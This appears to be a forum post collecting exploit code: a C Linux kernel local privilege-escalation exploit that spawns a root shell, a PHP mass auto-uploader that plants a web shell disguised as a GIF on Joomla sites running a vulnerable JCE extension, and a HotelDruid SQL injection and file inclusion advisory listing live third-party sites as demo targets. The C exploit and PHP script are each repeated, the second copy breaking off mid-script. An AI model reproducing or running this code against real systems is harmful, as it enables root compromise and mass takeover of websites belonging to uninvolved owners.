Priv8 | Local Root Exploit # HeRoTurk

s

/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
* 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
* 1 \ \____/ >> Exploit database separated by exploit 0
* 0 \/___/ type (local, remote, DoS, etc.) 1
* 1 0
* 0 By CrosS 1
* 1 0
* 0 Linux 2011 1
* 1 0
* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18-128.el5
* Linux 2.6.9-89.EL
* Ubuntu 8.10 Linux 2.6.27
*
* For i386 & ppc compile with the command;
* gcc -w -o exploit exploit.c
*
* For x86_64 kernel and ppc64 Compile as;
* gcc -w -m64 -o exploit exploit.c
*
* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... & all members of r00tw0rm.com ( RW ) .. )
*
* Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
*
* For Educational purpose Only))
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;

asm volatile ("movq %%rsp,%0; " : "=r" (sp));

return sp;
}

#else
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;

asm volatile ("movl %%esp,%0" : "=r" (sp));

return sp;
}

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;

asm volatile ("mr %0,%%r1; " : "=r" (sp));

return sp;
}

#endif

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct;

asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));

return task_struct;
}

#else
#define TASK_RUNNING 0

static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct, thread_info;

thread_info = current_stack_pointer() & ~(4096 - 1);

if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;

/*
* The TASK_RUNNING is the Only poss1ble sta7e for a proCes5 exEcut1ng
* in us3r-spaCe.
*/
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}

/*
* Prior to the 2.6 kernel series, the task_struct was stored at the end
* of the kernel stack.
*/
task_struct = current_stack_pointer() & ~(8192 - 1);

if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;

thread_info = task_struct;

task_struct = *(unsigned long *)thread_info;

if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;

return -1;
}

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct, thread_info;

#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 - 1);

#else
task_struct = current_stack_pointer() & ~(8192 - 1);

#endif

if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;

thread_info = task_struct;

task_struct = *(unsigned long *)thread_info;

if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;

return -1;
}

#endif

#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;

static int
change_cred(****)
{
unsigned int *task_struct;

task_struct = (unsigned int *)current_task_struct();

while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid &&
task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid &&
task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}

task_struct++;
}

return -1;
}

#elif defined(__powerpc__) || defined(__powerpc64__)
static int
change_cred(****)
{
unsigned int *task_struct;

task_struct = (unsigned int *)current_task_struct();

while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}

if (task_struct[0] == task_struct[1] &&
task_struct[0] == task_struct[2] &&
task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] &&
task_struct[4] == task_struct[6] &&
task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}

task_struct++;
}

return -1;
}

#endif

#define PAGE_SIZE getpagesize()

int
main(****)
{
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XXXXXX";

#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();

#endif

if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror("mmap");
exit(EXIT_FAILURE);
}

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = '\xff';
addr[1] = '\x24';
addr[2] = '\x25';
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;

#else
addr[0] = '\xff';
addr[1] = '\x25';
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
/*
* The use of function descriptors by the Power 64-bit ELF ABI requires
* the use of a fake function descriptor.:P
*/
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;

#else
addr[0] = '\x3f';
addr[1] = '\xe0';
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = '\x63';
addr[5] = '\xff';
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = '\x7f';
addr[9] = '\xe9';
addr[10] = '\x03';
addr[11] = '\xa6';
addr[12] = '\x4e';
addr[13] = '\x80';
addr[14] = '\x04';
addr[15] = '\x20';

#endif

#endif

if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror("socket");
exit(EXIT_FAILURE);
}

if ((in_fd = mkstemp(template)) == -1) {
perror("mkstemp");
exit(EXIT_FAILURE);
}

if(unlink(template) == -1) {
perror("unlink");
exit(EXIT_FAILURE);
}

if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("ftruncate");
exit(EXIT_FAILURE);
}

sendfile(out_fd, in_fd, NULL, PAGE_SIZE);

execl("/bin/sh", "sh", "-i", NULL);

exit(EXIT_SUCCESS);
}

s

# Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser

Kod:

<?php

error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1);


function sendpacket($packet,$response = 0,$output = 0,$s=0)
{
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
    global $proxy, $host, $port, $html, $user, $pass;
    if ($proxy == '')
    {
        $ock = fsockopen($host,$port);
        stream_set_timeout($ock, 2);
        if (!$ock)
        {
            echo '-';
        }
    } else
    {
        $parts = explode(':',$proxy);
        echo '<font color=white>Connecting to proxy: '.$parts[0].':'.$parts[1].' ...<br><br/></font>';
        $ock   = fsockopen($parts[0],$parts[1]);
        stream_set_timeout($ock, 2);
        if (!$ock) 
        {
            echo '*';

        }
    }

        fputs($ock,$packet);
        if ($response == 1)
        {
            if ($proxy == '')
            {
                $html = '';
                while (!feof($ock))
                {
                    $html .= fgets($ock);
                }
            } else
            {
                $html = '';
                while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
                {
                    $html .= fread($ock,1);
                }
            }
        } else $html = '';

        fclose($ock);
        if ($response == 1 && $output == 1) echo nl2br(htmlentities($html));
        if ($s==1){
        $count=0;
        $res=nl2br(htmlentities($html));
        $str = array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
        foreach ($str as $value){
        $pos = strpos($res, $value);
        if ($pos === false) {
        $count=$count++;
        } else {       ;

        }
        }
        if ($count=10)      ;  
        }
}

     $xxxx=0;
if($xxxx==0){
   $veri = trim(file_get_contents("hm.txt"));   //$host   = $_POST['host'];    //$path   = $_POST['path'];    $port   = "";     //$port   = $_POST['port'];     $proxy   = "";    //$proxy   = $_POST['proxy'];       $veri = str_replace("http://","",$veri);   $site = explode("\r\n",$veri);   //echo $site[0];   //var_dump($site);      foreach($site as $x){    // www. &#38;#304;le Ba&#38;#351;layanlar&#38;#305; Bulmaz    if(substr($x,0,4) == "www."){          //echo $x."<br>";     $site = explode("/",$x);     //var_dump($site);     if(count($site) > 2 ){      $path = "/".$site[1]."/";      $host = $site[0];      //echo "<font color = red >".$host.$path."<br></font>";           }elseif(count($site) > 1){            $path = "/".$site[1]."/";      $path = str_replace("//","/",$path);      $host = $site[0];      //echo "<font color = red >".$host.$path."<br></font>";            }else{           $path = "/";      $host = $site[0];      //echo "<font color = red >".$host.$path."<br></font>";     }     // # www. Biti&#38;#351;i         }else{          //echo $x."<br>";     $site = explode("/",$x);     //var_dump($site);     $w = "www.";     if(count($site) > 2 ){      $path = "/".$site[1]."/";      $host = $w.$site[0];      //echo "<font color = red >".$host.$path."<br></font>";           }elseif(count($site) > 1){            $path = "/".$site[1]."/";      $path = str_replace("//","/",$path);      $host = $w.$site[0];      //echo "<font color = red >".$host.$path."<br></font>";            }else{           $path = "/";      $host = $w.$site[0];      //echo "<font color = red >".$host.$path."<br></font>";     }    }       
  
  $port=intval(trim($port));
  if ($port=='') {$port=80;}
  //if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('<font color=white>Error... check the path!</font>');}
  if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  $host=str_replace("\r\n","",$host);
  $path=str_replace("\r\n","",$path);
  

                                                  /* Packet 1 --> Checking Exploitability */
 
                                        /* Packet 2 --> Uploading shell as a gif file */
                                         
            $content = "GIF89a1\n";
            $content .= trim(file_get_contents("x.php"));
            $data    = "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
            $data   .= "/\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
            $data   .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
            $data   .= "0\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"m3rs1n.gif\"\r\n";
            $data   .= "Content-Type: image/gif\r\n\r\n";
            $data   .= "$content\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "m3rs1n\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
            $data   .= "upload\r\n";
            $data   .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
            $packet  = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
            $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
            $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
            $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
            $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
            $packet .= "Connection: Close\r\n";
            $packet .= "Proxy-Connection: close\r\n";
            $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
            $packet .= $data;
            
            sendpacket($packet,0,0,0);
            
                                          /* Packet 3 --> Change Extension from .gif to .php */
                                        
                                        
            $packet  = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
            $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
            $packet .= "Accept-Language: en-US,en;q=0.8\r\n";
            $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
            $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";
            $packet .= "Accept-Encoding: deflate\n";
            $packet .= "X-Request: JSON\r\n";
            $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";
            $ren ="json={\"fn\":\"folderRename\",\"args\":[\"/m3rs1n.gif\",\"m3rs1n.php\"]}";
            $packet .= "Content-Length: ".strlen($ren)."\r\n\r\n";
            $packet .= $ren."\r\n\r\n";
            
            sendpacket($packet,1,0,0);

                                          /* Packet 4 --> Check for successfully uploaded */
                                        
                                        
            $packet  = "Head ".$p."/images/stories/m3rs1n.php HTTP/1.1\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
            
            sendpacket($packet,1,0,0);
  
  if(stristr($html , '200 OK') != true)
  {
      echo '.';  
 } else {
      ;   $ac = fopen("shellerr.txt","a+");   fwrite($ac,$host.":".$port.$part."/images/stories/m3rs1n.php\n");
  echo "\nhttp://$host:$port$path"."/images/stories/m3rs1n.php\n";}flush();
}

} ?> 

s

+] Author: TUNISIAN CYBER

[+] Exploit Title:  Hoteldruid (PHP-residence) v1.X.X (SQLi/LFI) Multiple Vulenrabilities

[+] Date: 14-12-2013

[+] Category: WebApp

[+] Vendor: http://www.hoteldruid.com/en/download.html

[+] Google Dork: inurl:"mostra_sorgente.php"

[+] Tested on: Win7 , ubuntu 13.04

########################################################################################

Description:

Hoteldruid is an open source program for hotel management (property management software) suffers from Local File Inclusion and SQL injection

I/LFI:

http://127.0.0.1/php-residence/mostra_sorgente.php?file_sorgente=[FILE]

II/SQLi:

http://127.0.0.1/php-residence/creaprezzi.php?anno=[YEAR]'

http://127.0.0.1/php-residence/messaggi.php?id_sessione=&anno=[YEAR]'

Fix:

Upgrade to v2.0.3

Demo:

http://www.hoteldruid.com/demo/mostra_sorgente.php?file_sorgente=clienti.php

https://lodginginspirational.com/mostra_sorgente.php?file_sorgente=clienti.php

http://www.at184.com/availability/mostra_sorgente.php?file_sorgente=/

http://www.pantelleriaest.com/hoteldruid/mostra_sorgente.php?file_sorgente=crea_backup.php

http://tbg.evolve2.org/mostra_sorgente.php?file_sorgente=themes/snj/php/menu.php

s

/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
* 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
* 1 \ \____/ >> Exploit database separated by exploit 0
* 0 \/___/ type (local, remote, DoS, etc.) 1
* 1 0
* 0 By CrosS 1
* 1 0
* 0 Linux 2011 1
* 1 0
* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18-128.el5
* Linux 2.6.9-89.EL
* Ubuntu 8.10 Linux 2.6.27
*
* For i386 & ppc compile with the command;
* gcc -w -o exploit exploit.c
*
* For x86_64 kernel and ppc64 Compile as;
* gcc -w -m64 -o exploit exploit.c
*
* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... & all members of r00tw0rm.com ( RW ) .. )
*
* Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
*
* For Educational purpose Only))
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;

asm volatile ("movq %%rsp,%0; " : "=r" (sp));

return sp;
}

#else
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;

asm volatile ("movl %%esp,%0" : "=r" (sp));

return sp;
}

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long
current_stack_pointer(****)
{
unsigned long sp;

asm volatile ("mr %0,%%r1; " : "=r" (sp));

return sp;
}

#endif

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct;

asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));

return task_struct;
}

#else
#define TASK_RUNNING 0

static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct, thread_info;

thread_info = current_stack_pointer() & ~(4096 - 1);

if (*(unsigned long *)thread_info >= 0xc0000000) {
task_struct = *(unsigned long *)thread_info;

/*
* The TASK_RUNNING is the Only poss1ble sta7e for a proCes5 exEcut1ng
* in us3r-spaCe.
*/
if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;
}

/*
* Prior to the 2.6 kernel series, the task_struct was stored at the end
* of the kernel stack.
*/
task_struct = current_stack_pointer() & ~(8192 - 1);

if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;

thread_info = task_struct;

task_struct = *(unsigned long *)thread_info;

if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;

return -1;
}

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0

static __always_inline unsigned long
current_task_struct(****)
{
unsigned long task_struct, thread_info;

#if defined(__LP64__)
task_struct = current_stack_pointer() & ~(16384 - 1);

#else
task_struct = current_stack_pointer() & ~(8192 - 1);

#endif

if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;

thread_info = task_struct;

task_struct = *(unsigned long *)thread_info;

if (*(unsigned long *)task_struct == TASK_RUNNING)
return task_struct;

return -1;
}

#endif

#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;

static int
change_cred(****)
{
unsigned int *task_struct;

task_struct = (unsigned int *)current_task_struct();

while (task_struct) {
if (task_struct[0] == uid && task_struct[1] == uid &&
task_struct[2] == uid && task_struct[3] == uid &&
task_struct[4] == gid && task_struct[5] == gid &&
task_struct[6] == gid && task_struct[7] == gid) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}

task_struct++;
}

return -1;
}

#elif defined(__powerpc__) || defined(__powerpc64__)
static int
change_cred(****)
{
unsigned int *task_struct;

task_struct = (unsigned int *)current_task_struct();

while (task_struct) {
if (!task_struct[0]) {
task_struct++;
continue;
}

if (task_struct[0] == task_struct[1] &&
task_struct[0] == task_struct[2] &&
task_struct[0] == task_struct[3] &&
task_struct[4] == task_struct[5] &&
task_struct[4] == task_struct[6] &&
task_struct[4] == task_struct[7]) {
task_struct[0] = task_struct[1] =
task_struct[2] = task_struct[3] =
task_struct[4] = task_struct[5] =
task_struct[6] = task_struct[7] = 0;
break;
}

task_struct++;
}

return -1;
}

#endif

#define PAGE_SIZE getpagesize()

int
main(****)
{
char *addr;
int out_fd, in_fd;
char template[] = "/tmp/tmp.XXXXXX";

#if defined(__i386__) || defined(__x86_64__)
uid = getuid(), gid = getgid();

#endif

if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED|
MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) {
perror("mmap");
exit(EXIT_FAILURE);
}

#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
addr[0] = '\xff';
addr[1] = '\x24';
addr[2] = '\x25';
*(unsigned long *)&addr[3] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;

#else
addr[0] = '\xff';
addr[1] = '\x25';
*(unsigned long *)&addr[2] = 8;
*(unsigned long *)&addr[8] = (unsigned long)change_cred;

#endif

#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
/*
* The use of function descriptors by the Power 64-bit ELF ABI requires
* the use of a fake function descriptor.:P
*/
*(unsigned long *)&addr[0] = *(unsigned long *)change_cred;

#else
addr[0] = '\x3f';
addr[1] = '\xe0';
*(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
addr[4] = '\x63';
addr[5] = '\xff';
*(unsigned short *)&addr[6] = (unsigned short)change_cred;
addr[8] = '\x7f';
addr[9] = '\xe9';
addr[10] = '\x03';
addr[11] = '\xa6';
addr[12] = '\x4e';
addr[13] = '\x80';
addr[14] = '\x04';
addr[15] = '\x20';

#endif

#endif

if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) {
perror("socket");
exit(EXIT_FAILURE);
}

if ((in_fd = mkstemp(template)) == -1) {
perror("mkstemp");
exit(EXIT_FAILURE);
}

if(unlink(template) == -1) {
perror("unlink");
exit(EXIT_FAILURE);
}

if (ftruncate(in_fd, PAGE_SIZE) == -1) {
perror("ftruncate");
exit(EXIT_FAILURE);
}

sendfile(out_fd, in_fd, NULL, PAGE_SIZE);

execl("/bin/sh", "sh", "-i", NULL);

exit(EXIT_SUCCESS);
}

s

# Title: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser

Kod:

<?php

error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1);


function sendpacket($packet,$response = 0,$output = 0,$s=0)
{
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
    global $proxy, $host, $port, $html, $user, $pass;
    if ($proxy == '')
    {
        $ock = fsockopen($host,$port);
        stream_set_timeout($ock, 2);
        if (!$ock)
        {
            echo '-';
        }
    } else
    {
        $parts = explode(':',$proxy);
        echo '<font color=white>Connecting to proxy: '.$parts[0].':'.$parts[1].' ...<br><br/></font>';
        $ock   = fsockopen($parts[0],$parts[1]);
        stream_set_timeout($ock, 2);
        if (!$ock) 
        {
            echo '*';

        }
    }

        fputs($ock,$packet);
        if ($response == 1)
        {
            if ($proxy == '')
            {
                $html = '';
                while (!feof($ock))
                {
                    $html .= fgets($ock);
                }
            } else
            {
                $html = '';
                while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
                {
                    $html .= fread($ock,1);
                }
            }
        } else $html = '';

        fclose($ock);
        if ($response == 1 && $output == 1) echo nl2br(htmlentities($html));
        if ($s==1){
        $count=0;
        $res=nl2br(htmlentities($html));
        $str = array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</title','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12</title','1.5.7.13</title','1.5.7.14</title');
        foreach ($str as $value){
        $pos = strpos($res, $value);
        if ($pos === false) {
        $count=$count++;
        } else {       ;

        }
        }
        if ($count=10)      ;  
        }
}

     $xxxx=0;
if($xxxx==0){
   $veri = trim(file_get_contents("hm.txt"));   //$host   = $_POST['host'];    //$path   = $_POST['path'];    $port   = "";     //$port   = $_POST['port'];     $proxy   = "";    //$proxy   = $_POST['proxy'];       $veri = str_replace("http://","",$veri);   $site = explode("\r\n",$veri);   //echo $site[0];   //var_dump($site);      foreach($site as $x){    // www. &#38;#304;le Ba&#38;#351;layanlar&#38;#305; Bulmaz    if(substr($x,0,4) == "www."){          //echo $x."<br>";     $site = explode("/",$x);     //var_dump($site);     if(count($site) > 2 ){      $path = "/".$site[1]."/";      $host = $site[0];      //echo "<font color = red >".$host.$path."<br></font>";           }elseif(count($site) > 1){            $path = "/".$site[1]."/";      $path = str_replace("//","/",$path);      $host = $site[0];      //echo "<font color = red >".$host.$path."<br></font>";            }else{           $path = "/";      $host = $site[0];      //echo "<font color = red >".$host.$path."<br></font>";     }     // # www. Biti&#38;#351;i         }else{          //echo $x."<br>";     $site = explode("/",$x);     //var_dump($site);     $w = "www.";     if(count($site) > 2 ){      $path = "/".$site[1]."/";      $host = $w.$site[0];      //echo "<font color = red >".$host.$path."<br></font>";           }elseif(count($site) > 1){            $path = "/".$site[1]."/";      $path = str_replace("//","/",$path);      $host = $w.$site[0];      //echo "<font color = red >".$host.$path."<br></font>";            }else{           $path = "/";      $host = $w.$site[0];      //echo "<font color = red >".$host.$path."<br></font>";     }    }       
  
  $port=intval(trim($port));
  if ($port=='') {$port=80;}
  //if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('<font color=white>Error... check the path!</font>');}
  if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
  $host=str_replace("\r\n","",$host);
  $path=str_replace("\r\n","",$path);
  

                                                  /* Packet 1 --> Checking Exploitability */
 
                                        /* Packet 2 --> Uploading shell as a gif file */
                                         
            $content = "GIF89a1\n";
            $content .= trim(file_get_contents("x.php"));
            $data    = "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";
            $data   .= "/\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";
            $data   .= "Content-Type: application/octet-stream\r\n\r\n\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";
            $data   .= "0\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"m3rs1n.gif\"\r\n";
            $data   .= "Content-Type: image/gif\r\n\r\n";
            $data   .= "$content\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "m3rs1n\r\n";
            $data   .= "-----------------------------41184676334\r\n";
            $data   .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";
            $data   .= "upload\r\n";
            $data   .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";
            $packet  = "POST ".$p."/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
            $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";
            $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
            $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
            $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";
            $packet .= "Connection: Close\r\n";
            $packet .= "Proxy-Connection: close\r\n";
            $packet .= "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
            $packet .= $data;
            
            sendpacket($packet,0,0,0);
            
                                          /* Packet 3 --> Change Extension from .gif to .php */
                                        
                                        
